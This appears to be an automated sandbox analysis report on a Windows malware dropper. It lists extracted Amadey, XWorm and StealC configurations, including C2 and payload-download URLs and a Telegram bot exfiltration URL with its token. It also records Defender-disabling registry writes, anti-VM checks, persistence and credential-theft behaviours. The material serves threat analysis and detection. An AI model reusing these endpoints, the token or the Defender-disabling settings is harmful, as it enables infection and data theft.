Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
22/02/2025, 07:54
Static task
static1
Behavioral task
behavioral1
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win10v2004-20250217-en
General
-
Target
88345910e7756216c80bf4046952980b.exe
-
Size
2.1MB
-
MD5
88345910e7756216c80bf4046952980b
-
SHA1
f508e862e3d2b48a83dfa064d4655035953482c0
-
SHA256
c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704
-
SHA512
a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845
-
SSDEEP
49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
5.0
185.163.204.65:7000
SWaSxcOz2FkLWFU7
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/3112-252-0x0000000000200000-0x0000000000644000-memory.dmp family_povertystealer -
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/4920-674-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001e72b-27.dat family_xworm behavioral2/memory/4764-42-0x0000000000170000-0x00000000001A0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2560-124-0x00000000002E0000-0x0000000000746000-memory.dmp healer behavioral2/memory/2560-125-0x00000000002E0000-0x0000000000746000-memory.dmp healer behavioral2/memory/2560-180-0x00000000002E0000-0x0000000000746000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c1f22fc937.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5f380d8c90.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cfab217946.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3aa1c2e209.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2f49ddd8ab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8428c50b26.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sha256.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 4760 powershell.exe 25 5068 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 4760 powershell.exe 5068 powershell.exe 5288 powershell.exe 3552 powershell.exe 1520 powershell.exe 5044 powershell.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 14 400 skotes.exe 17 400 skotes.exe 134 400 skotes.exe 134 400 skotes.exe 134 400 skotes.exe 22 4760 powershell.exe 25 5068 powershell.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4360 chrome.exe 4432 msedge.exe 3864 msedge.exe 6708 msedge.exe 1072 chrome.exe 2368 chrome.exe 5396 msedge.exe 6700 msedge.exe 4528 chrome.exe -
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5f380d8c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2f49ddd8ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cfab217946.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3aa1c2e209.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5f380d8c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8428c50b26.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c1f22fc937.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2f49ddd8ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cfab217946.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c1f22fc937.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8428c50b26.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3aa1c2e209.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation uXivbut.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 29 IoCs
pid Process 400 skotes.exe 4764 7tzlyz8.exe 936 3dc1ff6f06.exe 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 3164 483d2fa8a0d53818306efeb32d3.exe 680 d538f57e36.exe 4344 skotes.exe 3092 9d1f9cbe0c.exe 1904 5f380d8c90.exe 3112 ftS1RPn.exe 3740 ebp51gY.exe 744 DF9PCFR.exe 1988 uXivbut.exe 4364 Gxtuum.exe 3080 8QQOJj9.exe 4496 sha256.exe 1300 04bc3c33ae.exe 4024 2d7e0e2767.exe 3596 7tzlyz8.exe 1204 skotes.exe 3068 Gxtuum.exe 3852 DF9PCFR.exe 1900 2f49ddd8ab.exe 3200 cfab217946.exe 4920 3aa1c2e209.exe 4584 c1f22fc937.exe 5264 8428c50b26.exe 5772 d5ad6d736f.exe 4468 d842b69899.exe -
Identifies Wine through registry keys 2 TTPs 19 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 2f49ddd8ab.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 5f380d8c90.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine cfab217946.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 8428c50b26.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine sha256.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3aa1c2e209.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine c1f22fc937.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c1f22fc937.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091335001\\c1f22fc937.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8428c50b26.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091336001\\8428c50b26.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d5ad6d736f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091337001\\d5ad6d736f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3dc1ff6f06.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091274101\\3dc1ff6f06.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091275021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000200000001e72e-47.dat autoit_exe behavioral2/files/0x0012000000023a87-680.dat autoit_exe behavioral2/files/0x000a000000023c4d-702.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 1564 88345910e7756216c80bf4046952980b.exe 400 skotes.exe 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 3164 483d2fa8a0d53818306efeb32d3.exe 4344 skotes.exe 1904 5f380d8c90.exe 3112 ftS1RPn.exe 3740 ebp51gY.exe 1988 uXivbut.exe 4364 Gxtuum.exe 3080 8QQOJj9.exe 4496 sha256.exe 1204 skotes.exe 3068 Gxtuum.exe 1900 2f49ddd8ab.exe 3200 cfab217946.exe 4920 3aa1c2e209.exe 4584 c1f22fc937.exe 5264 8428c50b26.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 680 set thread context of 2596 680 d538f57e36.exe 126 PID 744 set thread context of 3852 744 DF9PCFR.exe 124 PID 1300 set thread context of 1172 1300 04bc3c33ae.exe 129 PID 1900 set thread context of 976 1900 2f49ddd8ab.exe 138 PID 4024 set thread context of 2308 4024 2d7e0e2767.exe 134 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 88345910e7756216c80bf4046952980b.exe File created C:\Windows\Tasks\Gxtuum.job uXivbut.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sha256.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1f22fc937.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d5ad6d736f.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage d5ad6d736f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9d1f9cbe0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language d5ad6d736f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3dc1ff6f06.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 04bc3c33ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3aa1c2e209.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d538f57e36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d7e0e2767.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cfab217946.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d842b69899.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5f380d8c90.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f49ddd8ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8428c50b26.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3aa1c2e209.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3aa1c2e209.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4504 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 5800 taskkill.exe 5900 taskkill.exe 5980 taskkill.exe 6048 taskkill.exe 4080 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846846079526529" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4380 schtasks.exe 4296 schtasks.exe 5184 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4764 7tzlyz8.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
